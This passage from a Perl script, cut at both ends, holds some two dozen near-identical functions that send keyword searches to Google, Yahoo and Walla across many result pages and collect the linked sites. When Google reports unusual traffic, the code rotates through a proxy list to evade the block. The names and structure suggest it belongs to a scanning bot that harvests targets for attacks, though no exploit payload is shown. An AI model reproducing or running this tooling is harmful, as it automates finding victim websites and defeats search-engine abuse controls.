  5930.  
  5931.             if ($link !~ /google/){
  5932.  
  5933.                 my @grep = &links($link);
  5934.  
  5935.                 push(@list,@grep);
  5936.  
  5937.                 }
  5938.  
  5939.             }
  5940.  
  5941.         }  
  5942.  
  5943.         return @list;
  5944.  
  5945.     }
  5946.  
  5947.  
  5948.  
  5949. sub jack10() {
  5950.  
  5951.     my @list;
  5952.  
  5953.     my $key = $_[0];
  5954.  
  5955.     for (my $i=0; $i<=1000; $i+=100){
  5956.  
  5957.         my $search = ($jack10.uri_escape($key)."&num=100&start=".$i);
  5958.  
  5959.         my $res = search_engine_query($search);
  5960.  
  5961.        
  5962.  
  5963.         if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) {
  5964.  
  5965.                $rand1 = $randombarner[rand(scalar(@randombarner))];
  5966.  
  5967.                $jack10 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  5968.  
  5969.                $search = ($jack10.uri_escape($key)."&num=100&start=".$i);
  5970.  
  5971.                $res = &search_engine_query($search);
  5972.  
  5973.            }
  5974.  
  5975.            
  5976.  
  5977.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  5978.  
  5979.             my $link = $1;
  5980.  
  5981.             if ($link !~ /google/){
  5982.  
  5983.                 my @grep = &links($link);
  5984.  
  5985.                 push(@list,@grep);
  5986.  
  5987.                 }
  5988.  
  5989.             }
  5990.  
  5991.         }  
  5992.  
  5993.         return @list;
  5994.  
  5995.     }
  5996.  
  5997.  
  5998.  
  5999. sub jack11() {
  6000.  
  6001.     my @list;
  6002.  
  6003.     my $key = $_[0];
  6004.  
  6005.     for (my $i=0; $i<=1000; $i+=100){
  6006.  
  6007.         my $search = ($jack11.uri_escape($key)."&num=100&start=".$i);
  6008.  
  6009.         my $res = search_engine_query($search);
  6010.  
  6011.        
  6012.  
  6013.         if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) {
  6014.  
  6015.                $rand1 = $randombarner[rand(scalar(@randombarner))];
  6016.  
  6017.                $jack11 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  6018.  
  6019.                $search = ($jack11.uri_escape($key)."&num=100&start=".$i);
  6020.  
  6021.                $res = &search_engine_query($search);
  6022.  
  6023.            }
  6024.  
  6025.            
  6026.  
  6027.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  6028.  
  6029.             my $link = $1;
  6030.  
  6031.             if ($link !~ /google/){
  6032.  
  6033.                 my @grep = &links($link);
  6034.  
  6035.                 push(@list,@grep);
  6036.  
  6037.                 }
  6038.  
  6039.             }
  6040.  
  6041.         }  
  6042.  
  6043.         return @list;
  6044.  
  6045.     }
  6046.  
  6047.  
  6048.  
  6049.  
  6050.  
  6051. sub jack12() {
  6052.  
  6053.     my @list;
  6054.  
  6055.     my $key = $_[0];
  6056.  
  6057.     for (my $i=0; $i<=1000; $i+=100){
  6058.  
  6059.         my $search = ($jack12.uri_escape($key)."&num=100&start=".$i);
  6060.  
  6061.         my $res = search_engine_query($search);
  6062.  
  6063.        
  6064.  
  6065.         if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) {
  6066.  
  6067.                $rand1 = $randombarner[rand(scalar(@randombarner))];
  6068.  
  6069.                $jack12 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  6070.  
  6071.                $search = ($jack12.uri_escape($key)."&num=100&start=".$i);
  6072.  
  6073.                $res = &search_engine_query($search);
  6074.  
  6075.            }
  6076.  
  6077.            
  6078.  
  6079.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  6080.  
  6081.             my $link = $1;
  6082.  
  6083.             if ($link !~ /google/){
  6084.  
  6085.                 my @grep = &links($link);
  6086.  
  6087.                 push(@list,@grep);
  6088.  
  6089.                 }
  6090.  
  6091.             }
  6092.  
  6093.         }  
  6094.  
  6095.         return @list;
  6096.  
  6097.     }
  6098.  
  6099.  
  6100.  
  6101. sub jack13() {
  6102.  
  6103.     my @list;
  6104.  
  6105.     my $key = $_[0];
  6106.  
  6107.     for (my $i=0; $i<=1000; $i+=100){
  6108.  
  6109.         my $search = ($jack13.uri_escape($key)."&num=100&start=".$i);
  6110.  
  6111.         my $res = search_engine_query($search);
  6112.  
  6113.        
  6114.  
  6115.         if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) {
  6116.  
  6117.                $rand1 = $randombarner[rand(scalar(@randombarner))];
  6118.  
  6119.                $jack13 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  6120.  
  6121.                $search = ($jack13.uri_escape($key)."&num=100&start=".$i);
  6122.  
  6123.                $res = &search_engine_query($search);
  6124.  
  6125.            }
  6126.  
  6127.            
  6128.  
  6129.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  6130.  
  6131.             my $link = $1;
  6132.  
  6133.             if ($link !~ /google/){
  6134.  
  6135.                 my @grep = &links($link);
  6136.  
  6137.                 push(@list,@grep);
  6138.  
  6139.                 }
  6140.  
  6141.             }
  6142.  
  6143.         }  
  6144.  
  6145.         return @list;
  6146.  
  6147.     }
  6148.  
  6149.  
  6150.  
  6151. sub jack14() {
  6152.  
  6153.     my @list;
  6154.  
  6155.     my $key = $_[0];
  6156.  
  6157.     for (my $i=0; $i<=1000; $i+=100){
  6158.  
  6159.         my $search = ($jack14.uri_escape($key)."&num=100&start=".$i);
  6160.  
  6161.         my $res = search_engine_query($search);
  6162.  
  6163.        
  6164.  
  6165.         if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) {
  6166.  
  6167.                $rand1 = $randombarner[rand(scalar(@randombarner))];
  6168.  
  6169.                $jack14 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  6170.  
  6171.                $search = ($jack14.uri_escape($key)."&num=100&start=".$i);
  6172.  
  6173.                $res = &search_engine_query($search);
  6174.  
  6175.            }
  6176.  
  6177.            
  6178.  
  6179.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  6180.  
  6181.             my $link = $1;
  6182.  
  6183.             if ($link !~ /google/){
  6184.  
  6185.                 my @grep = &links($link);
  6186.  
  6187.                 push(@list,@grep);
  6188.  
  6189.                 }
  6190.  
  6191.             }
  6192.  
  6193.         }  
  6194.  
  6195.         return @list;
  6196.  
  6197.     }
  6198.  
  6199.  
  6200.  
  6201. sub jack15() {
  6202.  
  6203.     my @list;
  6204.  
  6205.     my $key = $_[0];
  6206.  
  6207.     for (my $i=0; $i<=1000; $i+=100){
  6208.  
  6209.         my $search = ($jack15.uri_escape($key)."&num=100&start=".$i);
  6210.  
  6211.         my $res = search_engine_query($search);
  6212.  
  6213.        
  6214.  
  6215.         if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) {
  6216.  
  6217.                $rand1 = $randombarner[rand(scalar(@randombarner))];
  6218.  
  6219.                $jack15 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  6220.  
  6221.                $search = ($jack15.uri_escape($key)."&num=100&start=".$i);
  6222.  
  6223.                $res = &search_engine_query($search);
  6224.  
  6225.            }
  6226.  
  6227.            
  6228.  
  6229.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  6230.  
  6231.             my $link = $1;
  6232.  
  6233.             if ($link !~ /google/){
  6234.  
  6235.                 my @grep = &links($link);
  6236.  
  6237.                 push(@list,@grep);
  6238.  
  6239.                 }
  6240.  
  6241.             }
  6242.  
  6243.         }  
  6244.  
  6245.         return @list;
  6246.  
  6247.     }
  6248.  
  6249.  
  6250.  
  6251. sub jack16() {
  6252.  
  6253.     my @list;
  6254.  
  6255.     my $key = $_[0];
  6256.  
  6257.     for (my $i=0; $i<=1000; $i+=100){
  6258.  
  6259.         my $search = ($jack16.uri_escape($key)."&num=100&start=".$i);
  6260.  
  6261.         my $res = search_engine_query($search);
  6262.  
  6263.        
  6264.  
  6265.         if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) {
  6266.  
  6267.                $rand1 = $randombarner[rand(scalar(@randombarner))];
  6268.  
  6269.                $jack16 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  6270.  
  6271.                $search = ($jack16.uri_escape($key)."&num=100&start=".$i);
  6272.  
  6273.                $res = &search_engine_query($search);
  6274.  
  6275.            }
  6276.  
  6277.            
  6278.  
  6279.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  6280.  
  6281.             my $link = $1;
  6282.  
  6283.             if ($link !~ /google/){
  6284.  
  6285.                 my @grep = &links($link);
  6286.  
  6287.                 push(@list,@grep);
  6288.  
  6289.                 }
  6290.  
  6291.             }
  6292.  
  6293.         }  
  6294.  
  6295.         return @list;
  6296.  
  6297.     }
  6298.  
  6299.  
  6300.  
  6301. sub jack17() {
  6302.  
  6303.     my @list;
  6304.  
  6305.     my $key = $_[0];
  6306.  
  6307.     for (my $i=0; $i<=1000; $i+=100){
  6308.  
  6309.         my $search = ($jack17.uri_escape($key)."&num=100&start=".$i);
  6310.  
  6311.         my $res = search_engine_query($search);
  6312.  
  6313.        
  6314.  
  6315.         if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) {
  6316.  
  6317.                $rand1 = $randombarner[rand(scalar(@randombarner))];
  6318.  
  6319.                $jack17 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  6320.  
  6321.                $search = ($jack17.uri_escape($key)."&num=100&start=".$i);
  6322.  
  6323.                $res = &search_engine_query($search);
  6324.  
  6325.            }
  6326.  
  6327.            
  6328.  
  6329.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  6330.  
  6331.             my $link = $1;
  6332.  
  6333.             if ($link !~ /google/){
  6334.  
  6335.                 my @grep = &links($link);
  6336.  
  6337.                 push(@list,@grep);
  6338.  
  6339.                 }
  6340.  
  6341.             }
  6342.  
  6343.         }  
  6344.  
  6345.         return @list;
  6346.  
  6347.     }
  6348.  
  6349.  
  6350.  
  6351. sub jack18() {
  6352.  
  6353.     my @list;
  6354.  
  6355.     my $key = $_[0];
  6356.  
  6357.     for (my $i=0; $i<=1000; $i+=100){
  6358.  
  6359.         my $search = ($jack18.uri_escape($key)."&num=100&start=".$i);
  6360.  
  6361.         my $res = search_engine_query($search);
  6362.  
  6363.        
  6364.  
  6365.         if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) {
  6366.  
  6367.                $rand1 = $randombarner[rand(scalar(@randombarner))];
  6368.  
  6369.                $jack18 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  6370.  
  6371.                $search = ($jack18.uri_escape($key)."&num=100&start=".$i);
  6372.  
  6373.                $res = &search_engine_query($search);
  6374.  
  6375.            }
  6376.  
  6377.            
  6378.  
  6379.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  6380.  
  6381.             my $link = $1;
  6382.  
  6383.             if ($link !~ /google/){
  6384.  
  6385.                 my @grep = &links($link);
  6386.  
  6387.                 push(@list,@grep);
  6388.  
  6389.                 }
  6390.  
  6391.             }
  6392.  
  6393.         }  
  6394.  
  6395.         return @list;
  6396.  
  6397.     }
  6398.  
  6399.  
  6400.  
  6401. sub jack19() {
  6402.  
  6403.     my @list;
  6404.  
  6405.     my $key = $_[0];
  6406.  
  6407.     for (my $i=0; $i<=1000; $i+=100){
  6408.  
  6409.         my $search = ($jack19.uri_escape($key)."&num=100&start=".$i);
  6410.  
  6411.         my $res = search_engine_query($search);
  6412.  
  6413.        
  6414.  
  6415.         if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) {
  6416.  
  6417.                $rand1 = $randombarner[rand(scalar(@randombarner))];
  6418.  
  6419.                $jack19 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  6420.  
  6421.                $search = ($jack19.uri_escape($key)."&num=100&start=".$i);
  6422.  
  6423.                $res = &search_engine_query($search);
  6424.  
  6425.            }
  6426.  
  6427.            
  6428.  
  6429.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  6430.  
  6431.             my $link = $1;
  6432.  
  6433.             if ($link !~ /google/){
  6434.  
  6435.                 my @grep = &links($link);
  6436.  
  6437.                 push(@list,@grep);
  6438.  
  6439.                 }
  6440.  
  6441.             }
  6442.  
  6443.         }  
  6444.  
  6445.         return @list;
  6446.  
  6447.     }
  6448.  
  6449.  
  6450.  
  6451. sub jack20() {
  6452.  
  6453.     my @list;
  6454.  
  6455.     my $key = $_[0];
  6456.  
  6457.     for (my $i=0; $i<=1000; $i+=100){
  6458.  
  6459.         my $search = ($jack20.uri_escape($key)."&num=100&start=".$i);
  6460.  
  6461.         my $res = search_engine_query($search);
  6462.  
  6463.        
  6464.  
  6465.         if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) {
  6466.  
  6467.                $rand1 = $randombarner[rand(scalar(@randombarner))];
  6468.  
  6469.                $jack20 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  6470.  
  6471.                $search = ($jack20.uri_escape($key)."&num=100&start=".$i);
  6472.  
  6473.                $res = &search_engine_query($search);
  6474.  
  6475.            }
  6476.  
  6477.            
  6478.  
  6479.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  6480.  
  6481.             my $link = $1;
  6482.  
  6483.             if ($link !~ /google/){
  6484.  
  6485.                 my @grep = &links($link);
  6486.  
  6487.                 push(@list,@grep);
  6488.  
  6489.                 }
  6490.  
  6491.             }
  6492.  
  6493.         }  
  6494.  
  6495.         return @list;
  6496.  
  6497.     }
  6498.  
  6499.  
  6500.  
  6501. sub jack21() {
  6502.  
  6503.     my @list;
  6504.  
  6505.     my $key = $_[0];
  6506.  
  6507.     for (my $i=0; $i<=1000; $i+=100){
  6508.  
  6509.         my $search = ($jack21.uri_escape($key)."&num=100&start=".$i);
  6510.  
  6511.         my $res = search_engine_query($search);
  6512.  
  6513.        
  6514.  
  6515.         if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) {
  6516.  
  6517.                $rand1 = $randombarner[rand(scalar(@randombarner))];
  6518.  
  6519.                $jack21 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  6520.  
  6521.                $search = ($jack21.uri_escape($key)."&num=100&start=".$i);
  6522.  
  6523.                $res = &search_engine_query($search);
  6524.  
  6525.            }
  6526.  
  6527.            
  6528.  
  6529.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  6530.  
  6531.             my $link = $1;
  6532.  
  6533.             if ($link !~ /$badsite/){
  6534.  
  6535.                 my @grep = &links($link);
  6536.  
  6537.                 push(@list,@grep);
  6538.  
  6539.                 }
  6540.  
  6541.             }
  6542.  
  6543.         }  
  6544.  
  6545.         return @list;
  6546.  
  6547.     }
  6548.  
  6549.  
  6550.  
  6551.  
  6552.  
  6553. sub jack22() {
  6554.  
  6555.     my @list;
  6556.  
  6557.     my $key = $_[0];
  6558.  
  6559.     for (my $i=0; $i<=1000; $i+=100){
  6560.  
  6561.         my $search = ($jack22.uri_escape($key)."&num=100&start=".$i);
  6562.  
  6563.         my $res = search_engine_query($search);
  6564.  
  6565.        
  6566.  
  6567.         if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) {
  6568.  
  6569.                $rand1 = $randombarner[rand(scalar(@randombarner))];
  6570.  
  6571.                $jack22 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  6572.  
  6573.                $search = ($jack22.uri_escape($key)."&num=100&start=".$i);
  6574.  
  6575.                $res = &search_engine_query($search);
  6576.  
  6577.            }
  6578.  
  6579.            
  6580.  
  6581.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  6582.  
  6583.             my $link = $1;
  6584.  
  6585.             if ($link !~ /$badsite/){
  6586.  
  6587.                 my @grep = &links($link);
  6588.  
  6589.                 push(@list,@grep);
  6590.  
  6591.                 }
  6592.  
  6593.             }
  6594.  
  6595.         }  
  6596.  
  6597.         return @list;
  6598.  
  6599.     }
  6600.  
  6601.  
  6602.  
  6603. sub jack23() {
  6604.  
  6605.     my @list;
  6606.  
  6607.     my $key = $_[0];
  6608.  
  6609.     for (my $i=0; $i<=1000; $i+=100){
  6610.  
  6611.         my $search = ($jack23.uri_escape($key)."&num=100&start=".$i);
  6612.  
  6613.         my $res = search_engine_query($search);
  6614.  
  6615.        
  6616.  
  6617.         if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) {
  6618.  
  6619.                $rand1 = $randombarner[rand(scalar(@randombarner))];
  6620.  
  6621.                $jack23 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  6622.  
  6623.                $search = ($jack23.uri_escape($key)."&num=100&start=".$i);
  6624.  
  6625.                $res = &search_engine_query($search);
  6626.  
  6627.            }
  6628.  
  6629.            
  6630.  
  6631.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  6632.  
  6633.             my $link = $1;
  6634.  
  6635.             if ($link !~ /$badsite/){
  6636.  
  6637.                 my @grep = &links($link);
  6638.  
  6639.                 push(@list,@grep);
  6640.  
  6641.                 }
  6642.  
  6643.             }
  6644.  
  6645.         }  
  6646.  
  6647.         return @list;
  6648.  
  6649.     }
  6650.  
  6651.  
  6652.  
  6653. sub jack24() {
  6654.  
  6655.     my @list;
  6656.  
  6657.     my $key = $_[0];
  6658.  
  6659.     for (my $i=0; $i<=1000; $i+=100){
  6660.  
  6661.         my $search = ($jack24.uri_escape($key)."&num=100&start=".$i);
  6662.  
  6663.         my $res = search_engine_query($search);
  6664.  
  6665.        
  6666.  
  6667.         if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) {
  6668.  
  6669.                $rand1 = $randombarner[rand(scalar(@randombarner))];
  6670.  
  6671.                $jack24 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  6672.  
  6673.                $search = ($jack24.uri_escape($key)."&num=100&start=".$i);
  6674.  
  6675.                $res = &search_engine_query($search);
  6676.  
  6677.            }
  6678.  
  6679.            
  6680.  
  6681.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  6682.  
  6683.             my $link = $1;
  6684.  
  6685.             if ($link !~ /$badsite/){
  6686.  
  6687.                 my @grep = &links($link);
  6688.  
  6689.                 push(@list,@grep);
  6690.  
  6691.                 }
  6692.  
  6693.             }
  6694.  
  6695.         }  
  6696.  
  6697.         return @list;
  6698.  
  6699.     }
  6700.  
  6701.  
  6702.  
  6703. sub jack25() {
  6704.  
  6705.     my @list;
  6706.  
  6707.     my $key = $_[0];
  6708.  
  6709.     for (my $i=0; $i<=1000; $i+=100){
  6710.  
  6711.         my $search = ($jack25.uri_escape($key)."&num=100&start=".$i);
  6712.  
  6713.         my $res = search_engine_query($search);
  6714.  
  6715.        
  6716.  
  6717.         if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) {
  6718.  
  6719.                $rand1 = $randombarner[rand(scalar(@randombarner))];
  6720.  
  6721.                $jack25 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  6722.  
  6723.                $search = ($jack25.uri_escape($key)."&num=100&start=".$i);
  6724.  
  6725.                $res = &search_engine_query($search);
  6726.  
  6727.            }
  6728.  
  6729.            
  6730.  
  6731.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  6732.  
  6733.             my $link = $1;
  6734.  
  6735.             if ($link !~ /$badsite/){
  6736.  
  6737.                 my @grep = &links($link);
  6738.  
  6739.                 push(@list,@grep);
  6740.  
  6741.                 }
  6742.  
  6743.             }
  6744.  
  6745.         }  
  6746.  
  6747.         return @list;
  6748.  
  6749.     }
  6750.  
  6751.  
  6752.  
  6753. sub jack26() {
  6754.  
  6755.     my @list;
  6756.  
  6757.     my $key = $_[0];
  6758.  
  6759.     for (my $i=0; $i<=1000; $i+=100){
  6760.  
  6761.         my $search = ($jack26.uri_escape($key)."&num=100&start=".$i);
  6762.  
  6763.         my $res = search_engine_query($search);
  6764.  
  6765.        
  6766.  
  6767.         if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) {
  6768.  
  6769.                $rand1 = $randombarner[rand(scalar(@randombarner))];
  6770.  
  6771.                $jack26 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  6772.  
  6773.                $search = ($jack26.uri_escape($key)."&num=100&start=".$i);
  6774.  
  6775.                $res = &search_engine_query($search);
  6776.  
  6777.            }
  6778.  
  6779.            
  6780.  
  6781.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  6782.  
  6783.             my $link = $1;
  6784.  
  6785.             if ($link !~ /$badsite/){
  6786.  
  6787.                 my @grep = &links($link);
  6788.  
  6789.                 push(@list,@grep);
  6790.  
  6791.                 }
  6792.  
  6793.             }
  6794.  
  6795.         }  
  6796.  
  6797.         return @list;
  6798.  
  6799.     }
  6800.  
  6801.  
  6802.  
  6803. sub jack27() {
  6804.  
  6805.     my @list;
  6806.  
  6807.     my $key = $_[0];
  6808.  
  6809.     for (my $i=0; $i<=1000; $i+=100){
  6810.  
  6811.         my $search = ($jack27.uri_escape($key)."&num=100&start=".$i);
  6812.  
  6813.         my $res = search_engine_query($search);
  6814.  
  6815.        
  6816.  
  6817.         if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) {
  6818.  
  6819.                $rand1 = $randombarner[rand(scalar(@randombarner))];
  6820.  
  6821.                $jack27 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  6822.  
  6823.                $search = ($jack27.uri_escape($key)."&num=100&start=".$i);
  6824.  
  6825.                $res = &search_engine_query($search);
  6826.  
  6827.            }
  6828.  
  6829.            
  6830.  
  6831.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  6832.  
  6833.             my $link = $1;
  6834.  
  6835.             if ($link !~ /$badsite/){
  6836.  
  6837.                 my @grep = &links($link);
  6838.  
  6839.                 push(@list,@grep);
  6840.  
  6841.                 }
  6842.  
  6843.             }
  6844.  
  6845.         }  
  6846.  
  6847.         return @list;
  6848.  
  6849.     }
  6850.  
  6851.  
  6852.  
  6853. sub jack28() {
  6854.  
  6855.     my @list;
  6856.  
  6857.     my $key = $_[0];
  6858.  
  6859.     for (my $i=0; $i<=1000; $i+=100){
  6860.  
  6861.         my $search = ($jack28.uri_escape($key)."&num=100&start=".$i);
  6862.  
  6863.         my $res = search_engine_query($search);
  6864.  
  6865.        
  6866.  
  6867.         if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) {
  6868.  
  6869.                $rand1 = $randombarner[rand(scalar(@randombarner))];
  6870.  
  6871.                $jack28 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  6872.  
  6873.                $search = ($jack28.uri_escape($key)."&num=100&start=".$i);
  6874.  
  6875.                $res = &search_engine_query($search);
  6876.  
  6877.            }
  6878.  
  6879.            
  6880.  
  6881.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  6882.  
  6883.             my $link = $1;
  6884.  
  6885.             if ($link !~ /$badsite/){
  6886.  
  6887.                 my @grep = &links($link);
  6888.  
  6889.                 push(@list,@grep);
  6890.  
  6891.                 }
  6892.  
  6893.             }
  6894.  
  6895.         }  
  6896.  
  6897.         return @list;
  6898.  
  6899.     }
  6900.  
  6901.  
  6902.  
  6903. sub jack29() {
  6904.  
  6905.     my @list;
  6906.  
  6907.     my $key = $_[0];
  6908.  
  6909.     for (my $i=0; $i<=1000; $i+=100){
  6910.  
  6911.         my $search = ($jack29.uri_escape($key)."&num=100&start=".$i);
  6912.  
  6913.         my $res = search_engine_query($search);
  6914.  
  6915.        
  6916.  
  6917.         if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) {
  6918.  
  6919.                $rand1 = $randombarner[rand(scalar(@randombarner))];
  6920.  
  6921.                $jack29 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  6922.  
  6923.                $search = ($jack29.uri_escape($key)."&num=100&start=".$i);
  6924.  
  6925.                $res = &search_engine_query($search);
  6926.  
  6927.            }
  6928.  
  6929.            
  6930.  
  6931.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  6932.  
  6933.             my $link = $1;
  6934.  
  6935.             if ($link !~ /$badsite/){
  6936.  
  6937.                 my @grep = &links($link);
  6938.  
  6939.                 push(@list,@grep);
  6940.  
  6941.                 }
  6942.  
  6943.             }
  6944.  
  6945.         }  
  6946.  
  6947.         return @list;
  6948.  
  6949.     }
  6950.  
  6951.  
  6952.  
  6953. sub jack30() {
  6954.  
  6955.     my @list;
  6956.  
  6957.     my $key = $_[0];
  6958.  
  6959.     for (my $i=0; $i<=1000; $i+=100){
  6960.  
  6961.         my $search = ($jack30.uri_escape($key)."&num=100&start=".$i);
  6962.  
  6963.         my $res = search_engine_query($search);
  6964.  
  6965.        
  6966.  
  6967.         if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) {
  6968.  
  6969.                $rand1 = $randombarner[rand(scalar(@randombarner))];
  6970.  
  6971.                $jack30 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  6972.  
  6973.                $search = ($jack30.uri_escape($key)."&num=100&start=".$i);
  6974.  
  6975.                $res = &search_engine_query($search);
  6976.  
  6977.            }
  6978.  
  6979.            
  6980.  
  6981.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  6982.  
  6983.             my $link = $1;
  6984.  
  6985.             if ($link !~ /$badsite/){
  6986.  
  6987.                 my @grep = &links($link);
  6988.  
  6989.                 push(@list,@grep);
  6990.  
  6991.                 }
  6992.  
  6993.             }
  6994.  
  6995.         }  
  6996.  
  6997.         return @list;
  6998.  
  6999.     }
  7000.  
  7001.  
  7002.  
  7003. sub kontol() {
  7004.  
  7005.     my @list;
  7006.  
  7007.     my $key = $_[0];
  7008.  
  7009.     for (my $i=0; $i<=1000; $i+=100){
  7010.  
  7011.         my $search = ("http://www.google.com/search?q=".uri_escape($key)."&num=100&filter=0&start=".$i);
  7012.  
  7013.         my $res = search_engine_query($search);
  7014.  
  7015.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  7016.  
  7017.             my $link = $1;
  7018.  
  7019.             if ($link !~ /google/){
  7020.  
  7021.                 my @grep = &links($link);
  7022.  
  7023.                 push(@list,@grep);
  7024.  
  7025.             }
  7026.  
  7027.         }
  7028.  
  7029.     }
  7030.  
  7031.     return @list;
  7032.  
  7033. }
  7034.  
  7035.  
  7036.  
  7037. sub pepek() {
  7038.  
  7039.         my @list;
  7040.  
  7041.         my $key = $_[0];
  7042.  
  7043.         for ($b=0; $b<=100; $b+=1) {
  7044.  
  7045.         my $search = ("http://search.walla.co.il/?q=".uri_escape($key)."&type=text&page=".$b);
  7046.  
  7047.         my $res = search_engine_query($search);
  7048.  
  7049.         while ($res =~ m/<a href=\"http:\/\/(.+?)\" title=/g) {
  7050.  
  7051.             my $link = $1;
  7052.  
  7053.             if ($link !~ /walla\.co\.il/){
  7054.  
  7055.                 my @grep = &links($link);
  7056.  
  7057.                 push(@list,@grep);
  7058.  
  7059.             }
  7060.  
  7061.         }
  7062.  
  7063.     }
  7064.  
  7065.     return @list;
  7066.  
  7067. }
  7068.  
  7069.  
  7070.  
  7071. sub tetek(){
  7072.  
  7073.     my @list;
  7074.  
  7075.         my $key = $_[0];
  7076.  
  7077.         for ($b=1; $b<=1000; $b+=10) {
  7078.  
  7079.         my $search = ("http://search.yahoo.com/search?p=".uri_escape($key)."&b=".$b);
  7080.  
  7081.         my $res = search_engine_query($search);
  7082.  
  7083.         while ($res =~ m/http\%3a\/\/(.+?)\"/g) {
  7084.  
  7085.             my $link = $1;
  7086.  
  7087.             if ($link !~ /yahoo\.com/){
  7088.  
  7089.                 my @grep = &links($link);
  7090.  
  7091.                 push(@list,@grep);
  7092.  
  7093.             }
  7094.  
  7095.         }
  7096.  
  7097.     }
  7098.  
  7099.     return @list;
  7100.  
  7101. }
  7102.  
  7103.  
  7104.  
  7105. sub itil() {
  7106.  
  7107.         my @list;
  7108.  
  7109.         my $key = $_[0];
  7110.  
